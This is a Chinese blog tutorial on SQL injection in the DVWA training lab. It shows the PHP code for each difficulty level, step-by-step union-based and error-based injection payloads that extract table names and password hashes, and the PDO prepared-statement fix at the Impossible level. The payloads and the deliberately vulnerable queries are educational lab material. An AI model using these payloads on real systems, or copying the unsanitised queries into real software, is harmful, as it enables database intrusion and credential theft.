- 1MQTT服务器搭建以及使用MQTT.fx测试_mqtt.fx 1.7
- 2数据库安装四种方法
- 3AI绘画draft:如何利用人工智能技术创造独特的艺术作品_draft ai绘图
- 4部署私有rustdesk
- 5《安富莱嵌入式周报》第306期:开源独轮车,Cortex-M85修订版r1发布,Terathon图形数学库,不断变革的IDE开发环境,各个厂家总动员_安富莱电子嵌入式周报 csdn
- 6Python爬虫:为什么你爬取不到网页数据_python爬虫得不到网页显示的数据
- 7自然语言处理的发展历程_自然语言发展
- 8QT实现用户登录功能_qt tcpsocket登录验证
- 9Oracle中的时间函数用法(to_date、to_char) (总结)_to_char(sysdate,'yyyy-mm-dd')
- 10Flutter组件--AspectRatio(宽高比组件), FractionallySizedBox(百分比)_flutter aspectratio
DVWA 之 SQL Injection_dvwa sql注入fatal error: uncaught mysqli_sql_excepti
赞
踩
汇总链接:
https://baynk.blog.csdn.net/article/details/100006641
------------------------------------------------------------------分割线------------------------------------------------------------------
SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。
下面对四种级别的代码进行分析。
Low
服务器端核心代码
<?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($GLOBALS["___mysqli_ston"]); } ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
可以看到,Low级别的代码对来自客户端的参数id没有进行任何的检查与过滤,存在明显的SQL注入。
漏洞利用
现实攻击场景下,攻击者是无法看到后端代码的,所以下面的手工注入步骤是建立在无法看到源码的基础上。
1.判断是否存在注入点,是字符型还是数字形
输入1,查询成功;
输入1 and 1=1,发现查询仍然成功;//非数字形
输入1/,发现查询仍然成功;
输入1’,查询失败。出现如下图:
从提示中判断出来,ID是被两个’'包括起来的,是属于字符型注入。
2.猜解SQL查询语句中的字段数
输入1’ order by 10#,发现报错无此字段,缩小一半继续尝试,5仍然报错,再次减少,最终输入1’ order by 2#正常显示,所以字段数为2。
3.确定显示的字段顺序
输入1′ union select 1,2#,查询成功:
4.获取当前用户,数据库,版本号
输入1’ union select 1,concat(user(),database(),version())#,查询成功:
数据库表名为dvwa。
5.获取数据库中的表
输入1’ and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’# ,查询成功
6.获取表中的字段名
输入1’ and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’ #,查询成功:
7.爆破关键字段
输入1’ or 1=2 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功:
8.最后可以通过www.cmd5.com来进行查询password。
admin的用户的密码为password。
Medium
服务器端核心代码
<?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); //将ID进行转义 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Display values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } // This is used later on in the index.php page // Setting it here so we can close the database connection in here like in the rest of the source scripts $query = "SELECT COUNT(*) FROM users;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); $number_of_rows = mysqli_fetch_row( $result )[0]; mysqli_close($GLOBALS["___mysqli_ston"]); ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
漏洞利用
虽然前端使用了下拉选择菜单,但我们依然可以通过抓包改参数,提交恶意构造的查询参数。
大部分步骤和低级一样,只是需要将页面在Burpsuite中发送到Repeater模块,不停的改提交的参数即可,注意的只有一点,由于将’和“符号转义了,所以不可以直接写库名和表名了,需要将库名和表名换为十六进制。
这里插入一种ErrorBase的盲注方法,用之前的方法也可以的。
1.由于转义了后,变为了整数型注入,利用之前得到的信息,直接来爆破库名。
输入1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x#
2.爆破表的数量
输入1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database() ),floor(rand(0)*2))x from information_schema.tables group by x#
得到表的数量为2。
3.爆破表的名字
输入1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database() ),floor(rand(0)*2))x from information_schema.tables group by x#
表有两张,分别是guestbook,users
4.爆users的字段名。
输入1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
5.爆字段的值
输入1 and 1=2 union select 1,concat((select group_concat(user_id,user,password) from users) ,floor(rand(0)*2))x from information_schema.tables group by x#
OK,结束~
High
服务器端核心代码
<?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
可以看到,与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入(sqlmap也是可以绕过的),因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。
漏洞利用
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉,自己添加LIMIT或者干脆不需要LIMIT的限制。
前面的过程省略,直接来最后一步:
1’ or 1=2 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#
Impossible
服务器端核心代码
<?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); $row = $data->fetch(); // Make sure only 1 result is returned if( $data->rowCount() == 1 ) { // Get values $first = $row[ 'first_name' ]; $last = $row[ 'last_name' ]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } } // Generate Anti-CSRF token generateSessionToken(); ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。
